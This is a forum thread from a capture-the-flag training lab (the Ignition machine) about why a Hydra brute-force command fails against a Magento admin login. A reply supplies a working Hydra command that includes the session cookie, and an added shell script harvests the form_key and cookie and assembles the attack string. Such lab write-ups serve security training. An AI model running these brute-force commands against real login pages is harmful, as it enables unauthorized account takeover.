Starting Point - Ignition - Task 6 - Using Hydra for Brute-Forcing

Hello everyone,
I completed the Ignition machine from Starting Point, but on Task 6, to avoid manual brute force, I also tried to use Hydra for brute-forcing it. It does not work and I don’t know the reason.

I created a wordlist of 10 strings (called wordlist.txt) and placed the correct password in the middle.

If I submit the command in the following way:

hydra -l admin -P wordlist.txt -u -f "ignition.htb" -s 80 -V http-form-post '/admin:form_key=L5doLYoTkK8BEEp5&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:F=<span>Welcome, please sign in</span>'

the output is “0 valid password found”. Why doesn’t it find the correct password?
I also tried other strings after :F=, such as incorrect or login-form, but I get the same output.

Note: form_key changes when it expires (you can check this by submitting some credentials manually and seeing whether you get the message Invalid key; then refresh and grab the current form_key from the browser dev tools).

Thank you in advance!

Hello young sir!

In this case the form also expects the cookie, so you need to provide it accordingly. You can use Burp Suite to capture the cookie and the form key easily. Once this is done, it's important that you have the right syntax for hydra.

hydra -l admin -P ./passwordstest -u "ignition.htb" -s 80 http-post-form "/admin:form_key=xxxxxxxxxxxx&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:H=Cookie\: admin=xxxxxxxxxxxxxx; form_key=xxxxxxxxxxxx:F=Incorrect" -I

(Note the backslash in Cookie\: – hydra uses unescaped colons to separate the fields of the http-post-form string, so the colon after the header name has to be escaped or the Cookie header is cut off and never sent.)

Hey, if you found this useful, I’d appreciate it if you visit my YT page. I will be uploading a video about this soon :) - InfraFort - YouTube
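The two values the reply says to capture with Burp Suite can also be harvested and stitched into the hydra syntax from a shell, which makes it easy to redo when the form_key expires. The block below is an added example and is not code from either post. It works on a constructed sample of the Magento /admin response (the cookie value is made up, the form_key reuses the one from the question), extracts the admin session cookie and the form_key, and builds the http-post-form option string with the colon in the Cookie header escaped as \: so hydra does not split the header at the wrong place. fetch_login_page is the curl call you would point at the real target instead of the sample; it is not run here.

```shell
#!/bin/sh
# Added example: harvest Magento admin login parameters and build the hydra
# http-post-form string. Sample data below is constructed, not captured.

# Constructed sample of the response headers from GET /admin on a Magento host.
SAMPLE_HEADERS='HTTP/1.1 200 OK
Set-Cookie: admin=2k7nq0cjb9s4r1ljhe1v6g4lm3; expires=Fri, 01-Jan-2021 00:00:00 GMT; Max-Age=900; path=/admin; HttpOnly
Content-Type: text/html; charset=UTF-8'

# Constructed sample of the relevant part of the login page body.
SAMPLE_BODY='<script>
    var FORM_KEY = "L5doLYoTkK8BEEp5";
</script>
<form method="post" action="http://ignition.htb/admin/" id="login-form">
    <input name="form_key" type="hidden" value="L5doLYoTkK8BEEp5" />
</form>'

# Live equivalent (not called here): headers and body of the login page in one go.
# Usage: fetch_login_page ignition.htb
fetch_login_page() {
    curl -s -i "http://$1/admin"
}

# Pull the hidden form_key field out of the login page HTML (first match wins).
extract_form_key() {
    printf '%s\n' "$1" | sed -n 's/.*name="form_key"[^>]*value="\([^"]*\)".*/\1/p' | head -n 1
}

# Pull the value of the "admin" session cookie out of the Set-Cookie header.
extract_admin_cookie() {
    printf '%s\n' "$1" | sed -n 's/^Set-Cookie: admin=\([^;]*\);.*/\1/p' | head -n 1
}

# Assemble the hydra http-post-form string: path:POST-body:H=header:F=fail-string.
# Hydra treats every unescaped ":" as a field separator, so the colon after
# "Cookie" is written as "\:" (the double backslash here yields one backslash).
build_hydra_form() {
    form_key="$1"
    admin_cookie="$2"
    printf '%s' "/admin:form_key=${form_key}&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:H=Cookie\\: admin=${admin_cookie}; form_key=${form_key}:F=Incorrect"
}

# Run against the constructed sample and print the hydra command to use.
FORM_KEY=$(extract_form_key "$SAMPLE_BODY")
ADMIN_COOKIE=$(extract_admin_cookie "$SAMPLE_HEADERS")
HYDRA_FORM=$(build_hydra_form "$FORM_KEY" "$ADMIN_COOKIE")
echo "hydra -l admin -P wordlist.txt -f -I -s 80 ignition.htb http-post-form \"$HYDRA_FORM\""
```

Both the cookie and the form_key belong to one server-side session, so they have to be captured together and the hydra run has to finish before that session expires; if the responses start coming back with the Invalid key message from the question, re-harvest both values and start again (-I tells hydra to ignore the old restore file).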